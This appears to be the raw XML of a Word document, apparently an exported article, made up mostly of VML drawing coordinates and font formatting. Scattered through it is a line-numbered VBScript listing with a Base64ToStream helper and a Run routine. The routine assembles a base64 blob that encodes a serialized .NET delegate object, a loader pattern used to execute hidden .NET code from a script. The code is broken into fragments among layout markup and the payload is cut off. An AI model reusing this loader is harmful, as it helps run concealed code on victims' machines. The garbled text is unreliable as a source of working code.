27,2878,15527,2877,15527,2875,15527,2874,15527,2873,15527,2872,15527,2870,15527,2869,15527,2868,15527,2866,15527,2865,15527,2863,15527,2862,15527,2860,15527,2859,15527,2857,15527,2855,15527,2854,15527,2852,15527,2850,15527,2848,15527,2846,15527,2844,15527,2842,15527,2840,15527,2838,15527,2836,15527,2834,15527,2832,15527,2830,15527,2828,15527,2825,15527,2823,15527,2821,15527,2818,15527,2816,15527,2813,15527,2811,15527,2808,15527,2805,15527,2803,15527,2800,15527,2797,15527,2794,15527,2791,15527,2788,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15527,2785,15526,2785,15526,2785,15526,2785,15526,2785,15526,2785,15526,2785,15526,2785,15526,2785,15525,2785,15525,2785,15525,2785,15525,2785,15524,2785,15524,2785,15524,2785,15524,2785,15523,2785,15523,2785,15522,2785,15522,2785,15521,2785,15521,2785,15520,2785,15520,2785,15519,2785,15519,2785,15518,2785,15517,2785,15516,2785,15516,2785,15515,2785,15514,2785,15513,2785,15512,2785,15511,2785,15510,2785,15509,2785,15508,2785,15507,2785,15506,2785,15504,2785,15503,2785,15502,2785,15500,2785,15499,2785,15497,2785,15496,2785,15494,2785,15492,2785,15491,2785,15489,2785,15487,2785,15485,2785,15483,2785,15481,2785,15479,2785,15477,2785,15475,2785,15473,2785,15470,2785,15468,2785,15465,2785,15463,2785,15460,2785,15458,2785,15455,2785,15452,2785,15449,2785,15446,2785,15443,2785,15440,2785,15437,2785,15434,2785,15431,2785,15427,2785,15424,2785,15420,2785,15416,2785,15413,2785,15409,2785,15405,2785,15401,2785,15397,2785,15393,2785,15389,2785,15384,2785,15380,2785,15375,2785,15371,2785,15366,2785,15361,2785,15357,2785,15352,2785,15347,2785,15341,2785,15336,2785,15331,2785,15325,2785,15320,2785,15314,2785,15308,2785,15303,2785,15297,2785,15291,2785,15284,2785,15278,2785,15272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13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Function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Base64ToStream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b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)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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="19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Dim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enc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length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ba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transform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ms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15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Set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enc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CreateObject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"System.Text.ASCIIEncoding"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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16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length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enc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GetByteCount_2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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b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)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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7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Set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transform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CreateObject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"System.Security.Cryptography.FromBase64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Transform"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)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18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Set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ms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CreateObject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"System.IO.MemoryStream"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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19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ms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Write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transform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TransformFinalBlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15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enc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GetBytes_4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b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length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18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length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18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4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18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*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18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3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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="1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ms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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Position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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="18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Set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Base64ToStream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ms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8302" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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End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Function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23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9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>24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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sub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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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Dim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s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entry_class</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136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26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="1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7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"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0a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W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9uSG9sZGVy"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27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"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnY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XRlU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2VyaWFsaXph"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28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"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhb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Gl6Y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XRpb25Ib2xk"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29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"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib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2xkZ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XIJAgAAAAkD"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30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"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZ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GVyK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0RlbGVnYXRl"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31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"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3Nlb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WJse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Q50YXJnZXRU"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32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"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3Rlb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S5EZ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WxlZ2F0ZVNl"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33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"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5Sd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W50a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W1lLlJlbW90"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34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"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlc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nNpb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249Mi4wLjAu"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35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"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5M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zRlM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Dg5BgcAAAAH"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36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"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY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0lud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m9rZQoEAwAA"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37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"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ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2F0Z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Qd0YXJnZXQw"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38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"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlc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itEZ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WxlZ2F0ZUVu"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39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"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvb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khvb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GRlcgkLAAAA"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40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"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZ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XJpY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WxpemF0aW9u"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842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:18.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,370" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:370;width:8990;height:650" coordorigin="1490,370" coordsize="8990,650" path="m1510,399l1510,399,1510,399,1510,399,1510,399,1510,399,1510,399,1511,399,1512,399,1512,399,1514,399,1515,399,1517,399,1519,399,1521,399,1524,399,1528,399,1532,399,1536,399,1541,399,1546,399,1552,399,1559,399,1566,399,1575,399,1583,399,1593,399,1603,399,1615,399,1627,399,1640,399,1654,399,1668,399,1684,399,1701,399,1719,399,1738,399,1758,399,1780,399,1802,399,1826,399,1851,399,1877,399,1904,399,1933,399,1963,399,1995,399,2028,399,2063,399,2099,399,2136,399,2175,399,2216,399,2259,399,2303,399,2348,399,2396,399,2445,399,2496,399,2549,399,2604,399,2660,399,2719,399,2779,399,2841,399,2906,399,2972,399,3041,399,3112,399,3184,399,3259,399,3336,399,3416,399,3498,399,3582,399,3668,399,3757,399,3848,399,3941,399,4037,399,4136,399,4236,399,4340,399,4446,399,4555,399,4666,399,4780,399,4897,399,5017,399,5139,399,5264,399,5392,399,5523,399,5657,399,5793,399,5933,399,6076,399,6222,399,6370,399,6522,399,6677,399,6835,399,6997,399,7161,399,7329,399,7500,399,7675,399,7853,399,8034,399,8219,399,8407,399,8598,399,8793,399,8992,399,9194,399,9400,399,9609,399,9823,399,10039,399,10260,399,10484,399,10484,399,10484,399,10484,399,10484,399,10484,399,10484,399,10484,399,10484,399,10484,399,10484,399,10484,400,10484,400,10484,400,10484,400,10484,400,10484,400,10484,401,10484,401,10484,401,10484,402,10484,402,10484,403,10484,403,10484,404,10484,404,10484,405,10484,406,10484,407,10484,407,10484,408,10484,409,10484,410,10484,411,10484,413,10484,414,10484,415,10484,417,10484,418,10484,420,10484,421,10484,423,10484,425,10484,427,10484,429,10484,431,10484,433,10484,436,10484,438,10484,441,10484,443,10484,446,10484,449,10484,452,10484,455,10484,458,10484,461,10484,465,10484,468,10484,472,10484,476,10484,480,10484,484,10484,488,10484,493,10484,497,10484,502,10484,507,10484,512,10484,517,10484,522,10484,527,10484,533,10484,539,10484,545,10484,551,10484,557,10484,563,10484,570,10484,577,10484,584,10484,591,10484,598,10484,605,10484,613,10484,621,10484,629,10484,637,10484,646,10484,654,10484,663,10484,672,10484,681,10484,690,10484,700,10484,710,10484,720,10484,730,10484,741,10484,751,10484,762,10484,773,10484,785,10484,796,10484,808,10484,820,10484,832,10484,845,10484,857,10484,870,10484,884,10484,897,10484,911,10484,925,10484,939,10484,953,10484,968,10484,983,10484,998,10484,1014,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10483,1030,10482,1030,10482,1030,10480,1030,10479,1030,10477,1030,10475,1030,10473,1030,10470,1030,10466,1030,10462,1030,10458,1030,10453,1030,10448,1030,10442,1030,10435,1030,10428,1030,10419,1030,10411,1030,10401,1030,10391,1030,10379,1030,10367,1030,10354,1030,10340,1030,10326,1030,10310,1030,10293,1030,10275,1030,10256,1030,10236,1030,10215,1030,10192,1030,10168,1030,10143,1030,10117,1030,10090,1030,10061,1030,10031,1030,9999,1030,9966,1030,9931,1030,9895,1030,9858,1030,9819,1030,9778,1030,9735,1030,9691,1030,9646,1030,9598,1030,9549,1030,9498,1030,9445,1030,9391,1030,9334,1030,9275,1030,9215,1030,9153,1030,9088,1030,9022,1030,8953,1030,8883,1030,8810,1030,8735,1030,8658,1030,8578,1030,8497,1030,8413,1030,8326,1030,8238,1030,8146,1030,8053,1030,7957,1030,7859,1030,7758,1030,7654,1030,7548,1030,7439,1030,7328,1030,7214,1030,7097,1030,6977,1030,6855,1030,6730,1030,6602,1030,6471,1030,6337,1030,6201,1030,6061,1030,5918,1030,5773,1030,5624,1030,5472,1030,5317,1030,5159,1030,4997,1030,4833,1030,4665,1030,4494,1030,4319,1030,4141,1030,3960,1030,3776,1030,3587,1030,3396,1030,3201,1030,3002,1030,2800,1030,2594,1030,2385,1030,2172,1030,1955,1030,1734,1030,1510,1030,1510,1030,1510,1030,1510,1030,1510,1030,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1028,1510,1028,1510,1028,1510,1028,1510,1027,1510,1027,1510,1027,1510,1026,1510,1026,1510,1025,1510,1024,1510,1024,1510,1023,1510,1022,1510,1021,1510,1020,1510,1019,1510,1018,1510,1017,1510,1016,1510,1015,1510,1013,1510,1012,1510,1011,1510,1009,1510,1007,1510,1006,1510,1004,1510,1002,1510,1000,1510,998,1510,995,1510,993,1510,991,1510,988,1510,986,1510,983,1510,980,1510,977,1510,974,1510,971,1510,967,1510,964,1510,960,1510,957,1510,953,1510,949,1510,945,1510,940,1510,936,1510,931,1510,927,1510,922,1510,917,1510,912,1510,907,1510,901,1510,896,1510,890,1510,884,1510,878,1510,872,1510,865,1510,859,1510,852,1510,845,1510,838,1510,831,1510,823,1510,816,1510,808,1510,800,1510,792,1510,783,1510,775,1510,766,1510,757,1510,748,1510,738,1510,729,1510,719,1510,709,1510,699,1510,688,1510,677,1510,667,1510,655,1510,644,1510,633,1510,621,1510,609,1510,597,1510,584,1510,571,1510,558,1510,545,1510,532,1510,518,1510,504,1510,490,1510,475,1510,461,1510,446,1510,430,1510,415,1510,399e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:19.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,390" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:390;width:30;height:630" coordorigin="1490,390" coordsize="30,630" path="m1517,399l1517,399,1517,399,1517,399,1517,399,1517,399,1517,399,1517,399,1517,399,1517,399,1517,399,1517,400,1517,400,1517,400,1517,400,1517,400,1517,400,1517,401,1517,401,1517,401,1517,402,1517,402,1517,403,1517,403,1517,404,1517,404,1517,405,1517,406,1517,407,1517,407,1517,408,1517,409,1517,410,1517,411,1517,413,1517,414,1517,415,1517,417,1517,418,1517,420,1517,421,1517,423,1517,425,1517,427,1517,429,1517,431,1517,433,1517,436,1517,438,1517,441,1517,443,1517,446,1517,449,1517,452,1517,455,1517,458,1517,461,1517,465,1517,468,1517,472,1517,476,1517,480,1517,484,1517,488,1517,493,1517,497,1517,502,1517,507,1517,512,1517,517,1517,522,1517,527,1517,533,1517,539,1517,545,1517,551,1517,557,1517,563,1517,570,1517,577,1517,584,1517,591,1517,598,1517,605,1517,613,1517,621,1517,629,1517,637,1517,646,1517,654,1517,663,1517,672,1517,681,1517,690,1517,700,1517,710,1517,720,1517,730,1517,741,1517,751,1517,762,1517,773,1517,785,1517,796,1517,808,1517,820,1517,832,1517,845,1517,857,1517,870,1517,884,1517,897,1517,911,1517,925,1517,939,1517,953,1517,968,1517,983,1517,998,1517,1014,1517,1030e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:50.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1010" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1010;width:8990;height:650" coordorigin="1490,1010" coordsize="8990,650" path="m1510,1030l1510,1030,1510,1030,1510,1030,1510,1030,1510,1030,1510,1030,1511,1030,1512,1030,1512,1030,1514,1030,1515,1030,1517,1030,1519,1030,1521,1030,1524,1030,1528,1030,1532,1030,1536,1030,1541,1030,1546,1030,1552,1030,1559,1030,1566,1030,1575,1030,1583,1030,1593,1030,1603,1030,1615,1030,1627,1030,1640,1030,1654,1030,1668,1030,1684,1030,1701,1030,1719,1030,1738,1030,1758,1030,1780,1030,1802,1030,1826,1030,1851,1030,1877,1030,1904,1030,1933,1030,1963,1030,1995,1030,2028,1030,2063,1030,2099,1030,2136,1030,2175,1030,2216,1030,2259,1030,2303,1030,2348,1030,2396,1030,2445,1030,2496,1030,2549,1030,2604,1030,2660,1030,2719,1030,2779,1030,2841,1030,2906,1030,2972,1030,3041,1030,3112,1030,3184,1030,3259,1030,3336,1030,3416,1030,3498,1030,3582,1030,3668,1030,3757,1030,3848,1030,3941,1030,4037,1030,4136,1030,4236,1030,4340,1030,4446,1030,4555,1030,4666,1030,4780,1030,4897,1030,5017,1030,5139,1030,5264,1030,5392,1030,5523,1030,5657,1030,5793,1030,5933,1030,6076,1030,6222,1030,6370,1030,6522,1030,6677,1030,6835,1030,6997,1030,7161,1030,7329,1030,7500,1030,7675,1030,7853,1030,8034,1030,8219,1030,8407,1030,8598,1030,8793,1030,8992,1030,9194,1030,9400,1030,9609,1030,9823,1030,10039,1030,10260,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1031,10484,1031,10484,1031,10484,1031,10484,1032,10484,1032,10484,1033,10484,1033,10484,1034,10484,1034,10484,1035,10484,1035,10484,1036,10484,1037,10484,1038,10484,1039,10484,1040,10484,1041,10484,1042,10484,1043,10484,1045,10484,1046,10484,1047,10484,1049,10484,1051,10484,1052,10484,1054,10484,1056,10484,1058,10484,1060,10484,1062,10484,1064,10484,1067,10484,1069,10484,1072,10484,1075,10484,1077,10484,1080,10484,1083,10484,1087,10484,1090,10484,1093,10484,1097,10484,1100,10484,1104,10484,1108,10484,1112,10484,1116,10484,1121,10484,1125,10484,1130,10484,1135,10484,1140,10484,1145,10484,1150,10484,1155,10484,1161,10484,1167,10484,1172,10484,1178,10484,1185,10484,1191,10484,1198,10484,1204,10484,1211,10484,1218,10484,1226,10484,1233,10484,1241,10484,1248,10484,1256,10484,1265,10484,1273,10484,1282,10484,1290,10484,1299,10484,1309,10484,1318,10484,1328,10484,1338,10484,1348,10484,1358,10484,1368,10484,1379,10484,1390,10484,1401,10484,1412,10484,1424,10484,1436,10484,1448,10484,1460,10484,1473,10484,1486,10484,1499,10484,1512,10484,1525,10484,1539,10484,1553,10484,1568,10484,1582,10484,1597,10484,1612,10484,1627,10484,1643,10484,1659,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10483,1675,10482,1675,10482,1675,10480,1675,10479,1675,10477,1675,10475,1675,10473,1675,10470,1675,10466,1675,10462,1675,10458,1675,10453,1675,10448,1675,10442,1675,10435,1675,10428,1675,10419,1675,10411,1675,10401,1675,10391,1675,10379,1675,10367,1675,10354,1675,10340,1675,10326,1675,10310,1675,10293,1675,10275,1675,10256,1675,10236,1675,10215,1675,10192,1675,10168,1675,10143,1675,10117,1675,10090,1675,10061,1675,10031,1675,9999,1675,9966,1675,9931,1675,9895,1675,9858,1675,9819,1675,9778,1675,9735,1675,9691,1675,9646,1675,9598,1675,9549,1675,9498,1675,9445,1675,9391,1675,9334,1675,9275,1675,9215,1675,9153,1675,9088,1675,9022,1675,8953,1675,8883,1675,8810,1675,8735,1675,8658,1675,8578,1675,8497,1675,8413,1675,8326,1675,8238,1675,8146,1675,8053,1675,7957,1675,7859,1675,7758,1675,7654,1675,7548,1675,7439,1675,7328,1675,7214,1675,7097,1675,6977,1675,6855,1675,6730,1675,6602,1675,6471,1675,6337,1675,6201,1675,6061,1675,5918,1675,5773,1675,5624,1675,5472,1675,5317,1675,5159,1675,4997,1675,4833,1675,4665,1675,4494,1675,4319,1675,4141,1675,3960,1675,3776,1675,3587,1675,3396,1675,3201,1675,3002,1675,2800,1675,2594,1675,2385,1675,2172,1675,1955,1675,1734,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1674,1510,1674,1510,1674,1510,1674,1510,1674,1510,1674,1510,1673,1510,1673,1510,1673,1510,1672,1510,1672,1510,1671,1510,1671,1510,1670,1510,1670,1510,1669,1510,1668,1510,1667,1510,1666,1510,1665,1510,1664,1510,1663,1510,1662,1510,1661,1510,1660,1510,1658,1510,1657,1510,1655,1510,1654,1510,1652,1510,1650,1510,1648,1510,1646,1510,1644,1510,1642,1510,1640,1510,1638,1510,1635,1510,1632,1510,1630,1510,1627,1510,1624,1510,1621,1510,1618,1510,1615,1510,1611,1510,1608,1510,1604,1510,1600,1510,1596,1510,1592,1510,1588,1510,1584,1510,1579,1510,1574,1510,1570,1510,1565,1510,1560,1510,1554,1510,1549,1510,1543,1510,1538,1510,1532,1510,1526,1510,1520,1510,1513,1510,1507,1510,1500,1510,1493,1510,1486,1510,1479,1510,1471,1510,1464,1510,1456,1510,1448,1510,1440,1510,1431,1510,1423,1510,1414,1510,1405,1510,1396,1510,1386,1510,1377,1510,1367,1510,1357,1510,1347,1510,1336,1510,1325,1510,1314,1510,1303,1510,1292,1510,1280,1510,1268,1510,1256,1510,1244,1510,1232,1510,1219,1510,1206,1510,1192,1510,1179,1510,1165,1510,1151,1510,1137,1510,1122,1510,1107,1510,1092,1510,1077,1510,1062,1510,1046,1510,1030e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:50.500pt;width:1.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1010" coordsize="30,670">
        <v:shape style="position:absolute;left:1490;top:1010;width:30;height:670" coordorigin="1490,1010" coordsize="30,670" path="m1517,1030l1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1031,1517,1031,1517,1031,1517,1031,1517,1032,1517,1032,1517,1033,1517,1033,1517,1034,1517,1034,1517,1035,1517,1035,1517,1036,1517,1037,1517,1038,1517,1039,1517,1040,1517,1041,1517,1042,1517,1043,1517,1045,1517,1046,1517,1047,1517,1049,1517,1051,1517,1052,1517,1054,1517,1056,1517,1058,1517,1060,1517,1062,1517,1064,1517,1067,1517,1069,1517,1072,1517,1075,1517,1077,1517,1080,1517,1083,1517,1087,1517,1090,1517,1093,1517,1097,1517,1100,1517,1104,1517,1108,1517,1112,1517,1116,1517,1121,1517,1125,1517,1130,1517,1135,1517,1140,1517,1145,1517,1150,1517,1155,1517,1161,1517,1167,1517,1172,1517,1178,1517,1185,1517,1191,1517,1198,1517,1204,1517,1211,1517,1218,1517,1226,1517,1233,1517,1241,1517,1248,1517,1256,1517,1265,1517,1273,1517,1282,1517,1290,1517,1299,1517,1309,1517,1318,1517,1328,1517,1338,1517,1348,1517,1358,1517,1368,1517,1379,1517,1390,1517,1401,1517,1412,1517,1424,1517,1436,1517,1448,1517,1460,1517,1473,1517,1486,1517,1499,1517,1512,1517,1525,1517,1539,1517,1553,1517,1568,1517,1582,1517,1597,1517,1612,1517,1627,1517,1643,1517,1659,1517,1675e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:82.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1650" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1650;width:8990;height:650" coordorigin="1490,1650" coordsize="8990,650" path="m1510,1675l1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1511,1675,1512,1675,1512,1675,1514,1675,1515,1675,1517,1675,1519,1675,1521,1675,1524,1675,1528,1675,1532,1675,1536,1675,1541,1675,1546,1675,1552,1675,1559,1675,1566,1675,1575,1675,1583,1675,1593,1675,1603,1675,1615,1675,1627,1675,1640,1675,1654,1675,1668,1675,1684,1675,1701,1675,1719,1675,1738,1675,1758,1675,1780,1675,1802,1675,1826,1675,1851,1675,1877,1675,1904,1675,1933,1675,1963,1675,1995,1675,2028,1675,2063,1675,2099,1675,2136,1675,2175,1675,2216,1675,2259,1675,2303,1675,2348,1675,2396,1675,2445,1675,2496,1675,2549,1675,2604,1675,2660,1675,2719,1675,2779,1675,2841,1675,2906,1675,2972,1675,3041,1675,3112,1675,3184,1675,3259,1675,3336,1675,3416,1675,3498,1675,3582,1675,3668,1675,3757,1675,3848,1675,3941,1675,4037,1675,4136,1675,4236,1675,4340,1675,4446,1675,4555,1675,4666,1675,4780,1675,4897,1675,5017,1675,5139,1675,5264,1675,5392,1675,5523,1675,5657,1675,5793,1675,5933,1675,6076,1675,6222,1675,6370,1675,6522,1675,6677,1675,6835,1675,6997,1675,7161,1675,7329,1675,7500,1675,7675,1675,7853,1675,8034,1675,8219,1675,8407,1675,8598,1675,8793,1675,8992,1675,9194,1675,9400,1675,9609,1675,9823,1675,10039,1675,10260,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1676,10484,1676,10484,1676,10484,1676,10484,1677,10484,1677,10484,1677,10484,1678,10484,1678,10484,1679,10484,1679,10484,1680,10484,1681,10484,1681,10484,1682,10484,1683,10484,1684,10484,1685,10484,1686,10484,1687,10484,1688,10484,1690,10484,1691,10484,1692,10484,1694,10484,1695,10484,1697,10484,1699,10484,1701,10484,1703,10484,1705,10484,1707,10484,1709,10484,1711,10484,1714,10484,1716,10484,1719,10484,1722,10484,1724,10484,1727,10484,1731,10484,1734,10484,1737,10484,1741,10484,1744,10484,1748,10484,1752,10484,1756,10484,1760,10484,1764,10484,1768,10484,1773,10484,1778,10484,1782,10484,1787,10484,1792,10484,1798,10484,1803,10484,1809,10484,1814,10484,1820,10484,1826,10484,1833,10484,1839,10484,1846,10484,1852,10484,1859,10484,1866,10484,1874,10484,1881,10484,1889,10484,1897,10484,1905,10484,1913,10484,1921,10484,1930,10484,1939,10484,1948,10484,1957,10484,1966,10484,1976,10484,1986,10484,1996,10484,2006,10484,2016,10484,2027,10484,2038,10484,2049,10484,2060,10484,2072,10484,2084,10484,2096,10484,2108,10484,2120,10484,2133,10484,2146,10484,2159,10484,2173,10484,2186,10484,2200,10484,2215,10484,2229,10484,2244,10484,2259,10484,2274,10484,2289,10484,2305,10484,2305,10484,2305,10484,2305,10484,2305,10484,2305,10484,2305,10483,2305